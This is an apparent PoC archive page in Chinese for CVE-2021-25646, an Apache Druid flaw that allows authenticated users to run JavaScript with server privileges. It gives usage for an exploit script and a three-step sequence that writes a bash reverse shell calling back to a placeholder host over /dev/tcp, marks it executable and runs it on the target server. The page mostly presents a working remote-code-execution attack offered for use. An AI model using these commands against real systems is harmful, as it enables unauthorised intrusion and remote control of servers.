关联漏洞
标题:
Apache Druid 访问控制错误漏洞
(CVE-2021-25646)
描述:Apache Druid是美国阿帕奇软件(Apache)基金会的一款使用Java语言编写的、面向列的开源分布式数据库。 Apache Druid 0.20.0和更早的版本存在访问控制错误漏洞,该漏洞允许经过身份验证的用户强制Druid运行用户提供的JavaScript代码,并执行服务器进程特权的代码。
描述
Apache Druid 远程代码执行复现(CVE-2021-25646)
介绍
usage: python3 CVE-2021-25646.py -u http://x.x.x.x -c cmd
反弹shell如下:
写入反弹shell脚本
python3 CVE-2021-25646.py -u http://x.x.x.x -c "echo 'bash -i >& /dev/tcp/x.x.x.x/xxxx 0>&1' > /tmp/1.sh"
赋予shell脚本执行权限
python3 CVE-2021-25646.py -u http://x.x.x.x -c "chmod +x /tmp/1.sh"
执行shell
python3 CVE-2021-25646.py -u http://x.x.x.x -c "/bin/bash /tmp/1.sh"
文件快照
[4.0K] /data/pocs/9dd02ef6340aca8232d7eec04f67583106d9bf2c
├── [1.9K] CVE-2021-25646.py
└── [ 405] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。